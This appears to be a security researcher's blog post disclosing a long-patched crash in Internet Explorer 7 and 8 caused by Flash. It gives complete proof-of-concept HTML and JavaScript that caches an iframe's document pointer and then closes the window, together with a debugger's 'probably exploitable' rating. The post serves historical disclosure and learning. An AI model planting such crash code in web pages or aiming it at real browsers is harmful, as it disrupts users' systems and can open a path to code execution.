IE DoS — Destroy Cached Flash IFrame Document

Saving a pointer to the Document of an iframe that contains a Flash file, and then closing the window that hosted it, crashes IE7 and IE8 in Protected Mode. The crash lands in Flash itself (Flash10c!DllUnregisterServer+0x265cd), classified PROBABLY_EXPLOITABLE — the faulting address controls code flow (hash 0x55367d68.0x28600b49).

<!-- index.html: opens the new window -->
<script language="JavaScript">
function main()
{
    window.open('new_window.html');
}
</script>
<input type="button" onclick="main();" value="Click here">

<!-- new_window.html: saves the document pointer and closes -->
<iframe id="swfIFrame" src="swf.swf"></iframe>
<script>
window.onload = function()
{
    opener.pDocument = document.all.swfIFrame.Document;
    window.close(); // Crash!
}
</script>

The crash requires IE Protected Mode (IE7/Vista or IE8/Win7). Tested with Flash 10.0.32.18. The issue was also reported to Adobe as it originates within the Flash OCX during its cleanup. Tested on Vista IE7 and Win7 IE8, both in Protected Mode.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Silverlight 4 WebOC: RCE, UXSS, Referrer Forgery, and More] :: [Staying Resident via a Cached Flash IFrame Document] >